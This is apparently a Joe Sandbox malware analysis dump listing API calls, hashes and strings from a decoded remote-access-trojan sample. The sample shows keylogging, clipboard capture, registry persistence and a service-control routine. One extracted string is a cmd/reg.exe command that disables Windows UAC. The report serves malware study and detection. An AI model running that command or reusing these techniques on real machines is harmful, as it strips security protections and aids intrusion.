                                           • Associated: 00000000.00000002.4476192590.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453d.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Service$CloseHandle$Open$ControlManager
                                          • String ID:
                                          • API String ID: 221034970-0
                                          • Opcode ID: 8eb54fa1672786e09d2219133f0626536d5b5b39631990794a881cefe09f2d9d
                                          • Instruction ID: 443f58cffa4f299642b313368f914f767bd977a6fac550f0ec2f38f013616b5a
                                          • Opcode Fuzzy Hash: 8eb54fa1672786e09d2219133f0626536d5b5b39631990794a881cefe09f2d9d
                                          • Instruction Fuzzy Hash: E4F0F631541318BBD7116F259C49DFF3B6CDB45B62F000026FE0992192EB68DD4595F9
                                          APIs
                                          • OpenSCManagerW.ADVAPI32(00000000,00000000,00000040,00000000,00000001,?,?,?,?,?,?,0041A634,00000000), ref: 0041AC4A
                                          • OpenServiceW.ADVAPI32(00000000,00000000,00000040,?,?,?,?,?,?,0041A634,00000000), ref: 0041AC5E
                                          • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A634,00000000), ref: 0041AC6B
                                          • ControlService.ADVAPI32(00000000,00000002,?,?,?,?,?,?,?,0041A634,00000000), ref: 0041AC7A
                                          • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A634,00000000), ref: 0041AC8C
                                          • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A634,00000000), ref: 0041AC8F
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.4476100610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                           • Associated: 00000000.00000002.4476085240.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.4476136774.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.4476158705.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.4476158705.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.4476192590.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453d.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Service$CloseHandle$Open$ControlManager
                                          • String ID:
                                          • API String ID: 221034970-0
                                          • Opcode ID: 7d40cec447ae271724922458aab5fd3d84dbec4ea928b02c1f03fd5bbfed4507
                                          • Instruction ID: 80b71cf000cc834045a6d48b23744411b71cc7e49355023a2f572df053a73ec4
                                          • Opcode Fuzzy Hash: 7d40cec447ae271724922458aab5fd3d84dbec4ea928b02c1f03fd5bbfed4507
                                          • Instruction Fuzzy Hash: 73F0C231501218ABD611AF65AC4AEFF3B6CDB45B62F00002AFE0992192EB38CD4595E9
                                          APIs
                                          • OpenSCManagerW.ADVAPI32(00000000,00000000,00000040,00000000,00000001,?,?,?,?,?,?,0041A5B4,00000000), ref: 0041ACB1
                                          • OpenServiceW.ADVAPI32(00000000,00000000,00000040,?,?,?,?,?,?,0041A5B4,00000000), ref: 0041ACC5
                                          • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A5B4,00000000), ref: 0041ACD2
                                          • ControlService.ADVAPI32(00000000,00000003,?,?,?,?,?,?,?,0041A5B4,00000000), ref: 0041ACE1
                                          • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A5B4,00000000), ref: 0041ACF3
                                          • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A5B4,00000000), ref: 0041ACF6
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.4476100610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                           • Associated: 00000000.00000002.4476085240.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.4476136774.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.4476158705.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.4476158705.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.4476192590.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453d.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Service$CloseHandle$Open$ControlManager
                                          • String ID:
                                          • API String ID: 221034970-0
                                          • Opcode ID: a0f35f664dbda9af56b5a5da66da559fb3e9fc57b8559f966e995c2fd7636ff5
                                          • Instruction ID: 4c72e2560426042a93d841201029be6eaa37955ba2c7d49e75f16ae618c5df44
                                          • Opcode Fuzzy Hash: a0f35f664dbda9af56b5a5da66da559fb3e9fc57b8559f966e995c2fd7636ff5
                                          • Instruction Fuzzy Hash: 85F0F631501228BBD7116F25AC49DFF3B6CDB45B62F00002AFE0992192EB38CD46A6F9
                                          APIs
                                          • RegOpenKeyExW.ADVAPI32(00000000,00000000,00000000,00020019,?), ref: 00413D81
                                            • Part of subcall function 00413A90: RegQueryInfoKeyW.ADVAPI32(?,?,00000104,00000000,?,?,?,?,?,?,?,?), ref: 00413AF7
                                            • Part of subcall function 00413A90: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000104,00000000,?,?,?,?), ref: 00413B26
                                            • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                                          • RegCloseKey.ADVAPI32(00000000,004660B4,004660B4,00466478,00466478,00000071), ref: 00413EEF
                                          Strings
                                          Memory Dump Source
                                          Yara matches
                                          Similarity
                                          • API ID: CloseEnumInfoOpenQuerysend
                                          • String ID: (aF$,aF$xdF
                                          • API String ID: 3114080316-1322504040
                                          • Opcode ID: 0b9da50034d62b322c9e97ec7b9b2d740b6e189dbc04b3620652c3da3570e91a
                                          • Instruction ID: 9135d8dbad86ad48596e871537d7b2906c3d36c2a7f97e2d86650b4d09e6d137
                                          • Opcode Fuzzy Hash: 0b9da50034d62b322c9e97ec7b9b2d740b6e189dbc04b3620652c3da3570e91a
                                          • Instruction Fuzzy Hash: E341A0316082406AC324FB26D852AEF72A59FD1348F80883FF54A671D6EF7C5D49866E
                                          APIs
                                          • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exe,00000104), ref: 00443515
                                          • _free.LIBCMT ref: 004435E0
                                          • _free.LIBCMT ref: 004435EA
                                          Strings
                                          Memory Dump Source
                                          Yara matches
                                          Similarity
                                          • API ID: _free$FileModuleName
                                          • String ID: 8(c$C:\Users\user\Desktop\1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exe
                                          • API String ID: 2506810119-907491793
                                          • Opcode ID: 85df99244543f45e80e68b9da345e50485f416d8f0a3fa02bb076d818d98866e
                                          • Instruction ID: e5efe6401a3e5f1db0e1141fbbc5a3d1caea7301f6195c2e8eaff0a3f5655f7e
                                          • Opcode Fuzzy Hash: 85df99244543f45e80e68b9da345e50485f416d8f0a3fa02bb076d818d98866e
                                          • Instruction Fuzzy Hash: D63193B1A00254BFEB21DF9A998199EBBF8EB84B15F10406BF40597311D6B88F41CB99
                                          APIs
                                            • Part of subcall function 00434801: __onexit.LIBCMT ref: 00434807
                                          • __Init_thread_footer.LIBCMT ref: 0040B7D2
                                          Strings
                                          Memory Dump Source
                                          Yara matches
                                          Similarity
                                          • API ID: Init_thread_footer__onexit
                                          • String ID: [End of clipboard]$[Text copied to clipboard]$ mG$xdF
                                          • API String ID: 1881088180-3895790603
                                          • Opcode ID: a39ea4b818e0b3528c8bb9c5d7a7518586b356a586ec79917f3024ceca11fa06
                                          • Instruction ID: 5c7e69c9d376070a9f10adc198010d279a990252db190bacd7f595afc81a80c0
                                          • Opcode Fuzzy Hash: a39ea4b818e0b3528c8bb9c5d7a7518586b356a586ec79917f3024ceca11fa06
                                          • Instruction Fuzzy Hash: B5216D31A102198ACB14FBA6D8929EDB375AF54318F10403FE506771E2EF7C6D4ACA8C
                                          APIs
                                          • RegisterClassExA.USER32(00000030), ref: 0041D5EC
                                          • CreateWindowExA.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,000000FD,00000000,00000000,00000000), ref: 0041D607
                                          • GetLastError.KERNEL32 ref: 0041D611
                                          Strings
                                          Memory Dump Source
                                          Yara matches
                                          Similarity
                                          • API ID: ClassCreateErrorLastRegisterWindow
                                          • String ID: 0$MsgWindowClass
                                          • API String ID: 2877667751-2410386613
                                          • Opcode ID: 722de5e8388a8877474a119f468a3301e062738380f3873f65828015e8b741e1
                                          • Instruction ID: e808ecd18ef19f47bd472c0c6462b34ef8490c58390ad3ae495a6aa035ed2a4b
                                          • Opcode Fuzzy Hash: 722de5e8388a8877474a119f468a3301e062738380f3873f65828015e8b741e1
                                          • Instruction Fuzzy Hash: 1F0125B1D00219ABDB00DFA5EC849EFBBBCEA08355F40453AF914A6241EB7589058AA4
                                          APIs
                                          • CreateProcessA.KERNEL32(C:\Windows\System32\cmd.exe,/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f,00000000,00000000,00000000,08000000,00000000,00000000,?,?), ref: 004077D6
                                          • CloseHandle.KERNEL32(?), ref: 004077E5
                                          • CloseHandle.KERNEL32(?), ref: 004077EA
                                          Strings
                                          • /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f, xrefs: 004077CC
                                          • C:\Windows\System32\cmd.exe, xrefs: 004077D1
                                          Memory Dump Source
                                          Yara matches
                                          Similarity
                                          • API ID: CloseHandle$CreateProcess
                                          • String ID: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f$C:\Windows\System32\cmd.exe
                                          • API String ID: 2922976086-4183131282
                                          • Opcode ID: c38a1c4fbaf06b70ee3143182280ce63ac5342037887d892980c2b2f1eb259a7
                                          • Instruction ID: 1887ccd63cb29ce90d3c4a9dee080bc6fb52b3336ad705aa4023eed0db3a7680
                                          • Opcode Fuzzy Hash: c38a1c4fbaf06b70ee3143182280ce63ac5342037887d892980c2b2f1eb259a7
                                          • Instruction Fuzzy Hash: 04F09672D4029C76CB20ABD7AC0EEDF7F3CEBC5B11F00051AF904A2045DA745400CAB5
                                          APIs
                                          • RegCreateKeyW.ADVAPI32(80000001,00000000,RG), ref: 0041385A
                                          • RegSetValueExW.ADVAPI32(RG,?,00000000,00000001,00000000,00000000,00475300,?,0040F85E,pth_unenc,004752E8), ref: 00413888
                                          • RegCloseKey.ADVAPI32(?,?,0040F85E,pth_unenc,004752E8), ref: 00413893
                                          Strings
                                          Memory Dump Source
                                          Yara matches
                                          Similarity
                                          • API ID: CloseCreateValue
                                          • String ID: pth_unenc$RG
                                          • API String ID: 1818849710-3487042679
                                          • Opcode ID: cbeea3386a39013b062d5e7225ad240eff34055e22739d6872e46d18ef669f40
                                          • Instruction ID: 9133f253890910ff78e8f434c24b82038cc7026402723a24ca4ec17c3e6d8cb5
                                          • Opcode Fuzzy Hash: cbeea3386a39013b062d5e7225ad240eff34055e22739d6872e46d18ef669f40
                                          • Instruction Fuzzy Hash: 15F0C271440218FBCF00AFA1EC45FEE376CEF00756F10452AF905A61A1E7759E04DA94
                                          APIs
                                          • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,0044338B,?,?,0044332B,?), ref: 004433FA
                                          • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 0044340D
                                          • FreeLibrary.KERNEL32(00000000,?,?,?,0044338B,?,?,0044332B,?), ref: 00443430
                                          Strings
                                          Memory Dump Source
                                          Yara matches
                                          Similarity
                                          • API ID: AddressFreeHandleLibraryModuleProc
                                          • String ID: CorExitProcess$mscoree.dll
                                          • API String ID: 4061214504-1276376045
                                          • Opcode ID: ffd65e2a986ef432bd98aae630379cdfc9b477bc787d361fad657d5437817096
                                          • Instruction ID: d7bd46dfab834bb5d48edea7818df211002af85bf4a2e706b61bd78119be3437
                                          • Opcode Fuzzy Hash: ffd65e2a986ef432bd98aae630379cdfc9b477bc787d361fad657d5437817096
                                          • Instruction Fuzzy Hash: 4EF04931900208FBDB159F65DC45B9EBF74EF04753F0040A5F805A2251DB758E40CA99
                                          APIs
                                          • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00405120
                                          • SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00404E7A,00000001), ref: 0040512C
                                          • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,?,?,?,?,?,?,?,?,?,00404E7A,00000001), ref: 00405137
                                          • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00404E7A,00000001), ref: 00405140
                                            • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                                          Strings
                                          Memory Dump Source
                                          Yara matches
                                          Similarity
                                          • API ID: Event$CloseCreateHandleLocalObjectSingleTimeWait
                                          • String ID: KeepAlive | Disabled
                                          • API String ID: 2993684571-305739064
                                          • Opcode ID: a1239bbaa258f2a34943f968a1ba77755cc365037cc61d007e051ef3d6ef4e82
                                          • Instruction ID: dc79248355977efa3495ea8e96f68553e1f2867eb32bbe7dc6984d352a193ca4
                                          • Opcode Fuzzy Hash: a1239bbaa258f2a34943f968a1ba77755cc365037cc61d007e051ef3d6ef4e82
                                          • Instruction Fuzzy Hash: 5DF06D71904711BBDB203B758D0AAAB7E95AB06315F0009BEF982916E2D6798C408F9A
                                          APIs
                                            • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                                          • GetModuleHandleA.KERNEL32(00000000,00020009), ref: 0041AE83
                                          • PlaySoundW.WINMM(00000000,00000000), ref: 0041AE91
                                          • Sleep.KERNEL32(00002710), ref: 0041AE98
                                          • PlaySoundW.WINMM(00000000,00000000,00000000), ref: 0041AEA1
                                          Strings
                                          Memory Dump Source
                                          Yara matches
                                          Similarity
                                          • API ID: PlaySound$HandleLocalModuleSleepTime
                                          • String ID: Alarm triggered
                                          • API String ID: 614609389-2816303416
                                          • Opcode ID: 3a0a6838436f72e464f3f9b922c545e7727b8fea0b38228e9900d288e1fe9cfd
                                          • Instruction ID: 264e31dd7f8ae4a58c3cd97330858728e5483d82e525179ed11d996d756d41c5
                                          • Opcode Fuzzy Hash: 3a0a6838436f72e464f3f9b922c545e7727b8fea0b38228e9900d288e1fe9cfd
                                          • Instruction Fuzzy Hash: 3EE0D826A40220779A10337B6D0FD6F3D29CAC3B2570100BFFA05660C2DD540C01C6FB
                                          APIs
                                          • GetStdHandle.KERNEL32(000000F5,00000000,?,?,?,?,?,?,0041CE7E), ref: 0041CDF3
                                          • GetConsoleScreenBufferInfo.KERNEL32(00000000,?,?,?,?,?,?,?,0041CE7E), ref: 0041CE00
                                          • SetConsoleTextAttribute.KERNEL32(00000000,0000000C,?,?,?,?,?,?,0041CE7E), ref: 0041CE0D
                                          • SetConsoleTextAttribute.KERNEL32(00000000,?,?,?,?,?,?,?,0041CE7E), ref: 0041CE20
                                          Strings
                                          • ______ (_____ \ _____) )_____ ____ ____ ___ ___ | __ /| ___ | \ / ___) _ \ /___)| | \ \| ____| | | ( (__| |_| |___ ||_| |_|_____)_|_|_|\____)___/(___/ , xrefs: 0041CE13
                                          Memory Dump Source
                                          Yara matches
                                          Similarity
                                          • API ID: Console$AttributeText$BufferHandleInfoScreen
                                          • String ID: ______ (_____ \ _____) )_____ ____ ____ ___ ___ | __ /| ___ | \ / ___) _ \ /___)| | \ \| ____| | | ( (__| |_| |___ ||_| |_|_____)_|_|_|\____)___/(___/
                                          • API String ID: 3024135584-2418719853
                                          • Opcode ID: e39debb9b2b39d29e793f9bd33498d8add4ef2108ba1fa2e7e75c33182c8a1d6
                                          • Instruction ID: 3099d3b49c49d1df3d44327ff87017ee7d1b0803ff7cdb2815dc6b7c28d9377e
                                          • Opcode Fuzzy Hash: e39debb9b2b39d29e793f9bd33498d8add4ef2108ba1fa2e7e75c33182c8a1d6
                                          • Instruction Fuzzy Hash: B6E04872504315E7E31027B5EC4DCAB7B7CE745613B100266FA16915D39A749C41C6B5
                                          Memory Dump Source
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 52d86c3ce57e0cfe0599c5a04198a87027602046587802b200418d3fba34e127
                                          • Instruction ID: 15e211ccade7fc2a5debfa8ad78d9bfa955d5b29a73147504924d067d3782226
                                          • Opcode Fuzzy Hash: 52d86c3ce57e0cfe0599c5a04198a87027602046587802b200418d3fba34e127
                                          • Instruction Fuzzy Hash: 2771D4319012569BEB21CF55C884AFFBB75EF55310F19412BE815672A0DB78CCC1CBA8
                                          APIs
                                          • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,0045F244), ref: 0044944F
                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,00472764,000000FF,00000000,0000003F,00000000,?,?), ref: 004494C7
                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,004727B8,000000FF,?,0000003F,00000000,?), ref: 004494F4
                                          • _free.LIBCMT ref: 0044943D
                                            • Part of subcall function 00446802: RtlFreeHeap.NTDLL(00000000,00000000,?,00450CEF,?,00000000,?,00000000,?,00450F93,?,00000007,?,?,004514DE,?), ref: 00446818
                                            • Part of subcall function 00446802: GetLastError.KERNEL32(?,?,00450CEF,?,00000000,?,00000000,?,00450F93,?,00000007,?,?,004514DE,?,?), ref: 0044682A
                                          • _free.LIBCMT ref: 00449609
                                          Memory Dump Source
                                          Yara matches
                                          Similarity
                                          • API ID: ByteCharMultiWide_free$ErrorFreeHeapInformationLastTimeZone
                                          • String ID:
                                          • API String ID: 1286116820-0
                                          • Opcode ID: 5cd2e88b37ead4a53a3ad7e2b8222e2e62bf3e8d34a7aba608fbabac987024fa
                                          • Instruction ID: 45cf5ea20785abb2a7eec221213eb08c1b8584214e6df16efc40294c4842d026
                                          • Opcode Fuzzy Hash: 5cd2e88b37ead4a53a3ad7e2b8222e2e62bf3e8d34a7aba608fbabac987024fa
                                          • Instruction Fuzzy Hash: 1B51EC71900205ABEB14EF69DD819AFB7B8EF44724F20066FE418D3291EB789D41DB58
                                          APIs
                                            • Part of subcall function 0041C048: GetCurrentProcess.KERNEL32(?,?,?,0040DAE5,WinDir,00000000,00000000), ref: 0041C059
                                            • Part of subcall function 0041C048: IsWow64Process.KERNEL32(00000000,?,?,0040DAE5,WinDir,00000000,00000000), ref: 0041C060
                                          • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0040F956
                                          • Process32FirstW.KERNEL32(00000000,?), ref: 0040F97A
                                          • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040F989
                                          • CloseHandle.KERNEL32(00000000), ref: 0040FB40
                                            • Part of subcall function 0041C076: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,0040F634,00000000,?,?,00475348), ref: 0041C08B
                                            • Part of subcall function 0041C076: IsWow64Process.KERNEL32(00000000,?,?,?,00475348), ref: 0041C096
                                            • Part of subcall function 0041C26E: OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041C286
                                            • Part of subcall function 0041C26E: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041C299
                                          • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040FB31
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.4476100610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                           • Associated: 00000000.00000002.4476085240.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.4476136774.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.4476158705.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.4476158705.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.4476192590.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453d.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Process$OpenProcess32$NextWow64$CloseCreateCurrentFirstHandleSnapshotToolhelp32
                                          • String ID:
                                          • API String ID: 2180151492-0
                                          • Opcode ID: bfc89bdae2d650767b4ed35271776d2baa802c3b02b644790fe930e075800330
                                          • Instruction ID: 39de0d33b69ea9088fa68d935cf3ef43cf04ff0480c7130c1a021fac56d243da
                                          • Opcode Fuzzy Hash: bfc89bdae2d650767b4ed35271776d2baa802c3b02b644790fe930e075800330
                                          • Instruction Fuzzy Hash: 8D4136311083419BC325F722DC51AEFB3A5AF94305F50493EF58A921E2EF385A49C65A
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.4476100610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                           • Associated: 00000000.00000002.4476085240.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.4476136774.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.4476158705.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.4476158705.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.4476192590.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453d.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: _free
                                          • String ID:
                                          • API String ID: 269201875-0
                                          • Opcode ID: 1c82e8231a1e7df7fc61a9fb39ee41d92c56425fa3e393906510b0ca3dcf776a
                                          • Instruction ID: bbec49e9ccdd5c2af131aecc9b6810ea24321c3eb42f74c08fbdd36582e243a3
                                          • Opcode Fuzzy Hash: 1c82e8231a1e7df7fc61a9fb39ee41d92c56425fa3e393906510b0ca3dcf776a
                                          • Instruction Fuzzy Hash: 5F41E232E00200AFEB14DF78C881A5EB3B5EF89B18F1545AEE915EB351D735AE05CB84
                                          APIs
                                          • MultiByteToWideChar.KERNEL32(?,00000000,?,00000000,00000000,00000000,0042DD92,?,?,?,00000001,00000000,?,00000001,0042DD92,0042DD92), ref: 004511F9
                                          • __alloca_probe_16.LIBCMT ref: 00451231
                                          • MultiByteToWideChar.KERNEL32(?,00000001,?,00000000,00000000,0042DD92,?,?,?,00000001,00000000,?,00000001,0042DD92,0042DD92,?), ref: 00451282
                                          • GetStringTypeW.KERNEL32(00000001,00000000,00000000,00000001,?,?,?,00000001,00000000,?,00000001,0042DD92,0042DD92,?,00000002,00000000), ref: 00451294
                                          • __freea.LIBCMT ref: 0045129D
                                            • Part of subcall function 004461B8: RtlAllocateHeap.NTDLL(00000000,00435329,?,?,004388C7,?,?,00000000,?,?,0040DE9D,00435329,?,?,?,?), ref: 004461EA
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.4476100610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                           • Associated: 00000000.00000002.4476085240.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.4476136774.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.4476158705.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.4476158705.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.4476192590.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453d.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: ByteCharMultiWide$AllocateHeapStringType__alloca_probe_16__freea
                                          • String ID:
                                          • API String ID: 313313983-0
                                          • Opcode ID: 695a5f3fdf384fa9d4863fe56c7c43b71593cfbe7e8d533d6dff3d4dffab5c55
                                          • Instruction ID: f723c28c07ecd650b398e20bb728631ced1c531215915adb10fa1f31571a6cea
                                          • Opcode Fuzzy Hash: 695a5f3fdf384fa9d4863fe56c7c43b71593cfbe7e8d533d6dff3d4dffab5c55
                                          • Instruction Fuzzy Hash: F7310331A0020AABDF249F65DC41EAF7BA5EB04701F0445AAFC08E72A2E739CC55CB94
                                          APIs
                                            • Part of subcall function 00413733: RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,00000000,00475300), ref: 0041374F
                                            • Part of subcall function 00413733: RegQueryValueExA.KERNEL32(00000000,00000000,00000000,00000000,00000208,?), ref: 00413768
                                            • Part of subcall function 00413733: RegCloseKey.KERNEL32(00000000), ref: 00413773
                                          • Sleep.KERNEL32(00000BB8), ref: 004127B5
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.4476100610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                           • Associated: 00000000.00000002.4476085240.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.4476136774.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.4476158705.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.4476158705.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.4476192590.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453d.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: CloseOpenQuerySleepValue
                                          • String ID: HSG$exepath$xdF$RG
                                          • API String ID: 4119054056-3038920021
                                          • Opcode ID: c4910f7145f7cabad12a11c825a9982b7c40ce0abb7968876c3fce6d3367946f
                                          • Instruction ID: 7f535f989f64e3217726da85717e45219a172cbdcd35e6ae3f2d68e0f7be43ad
                                          • Opcode Fuzzy Hash: c4910f7145f7cabad12a11c825a9982b7c40ce0abb7968876c3fce6d3367946f
                                          • Instruction Fuzzy Hash: 1F21D8A1B043042BD604B7365D4AAAF724D8B80358F40897FBA56E73D3EEBD9C45826D
                                          APIs
                                          • GetEnvironmentStringsW.KERNEL32 ref: 0044F3E3
                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0044F406
                                            • Part of subcall function 004461B8: RtlAllocateHeap.NTDLL(00000000,00435329,?,?,004388C7,?,?,00000000,?,?,0040DE9D,00435329,?,?,?,?), ref: 004461EA
                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0044F42C
                                          • _free.LIBCMT ref: 0044F43F
                                          • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0044F44E
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.4476100610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                           • Associated: 00000000.00000002.4476085240.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.4476136774.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.4476158705.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.4476158705.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.4476192590.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453d.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                          • String ID:
                                          • API String ID: 336800556-0
                                          • Opcode ID: 5a321bf6ad982bb41f22afd847bffa7b7f2aa598f804dd442cdb837d811de21f
                                          • Instruction ID: b6d7bf627ac8e1e23e8e90154f8049d5dc13ee9613ce4caf203d647ba434722a
                                          • Opcode Fuzzy Hash: 5a321bf6ad982bb41f22afd847bffa7b7f2aa598f804dd442cdb837d811de21f
                                          • Instruction Fuzzy Hash: 2401DF72602721BF37211ABB5C8DC7F6AACDEC6FA5355013AFD04D2202DE688D0691B9
                                          APIs
                                          • GetLastError.KERNEL32(?,00000000,00000000,0043BCD6,00000000,00000000,?,0043BD5A,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0044831E
                                          • _free.LIBCMT ref: 00448353
                                          • _free.LIBCMT ref: 0044837A
                                          • SetLastError.KERNEL32(00000000,?,00405103), ref: 00448387
                                          • SetLastError.KERNEL32(00000000,?,00405103), ref: 00448390
                                          Memory Dump Source
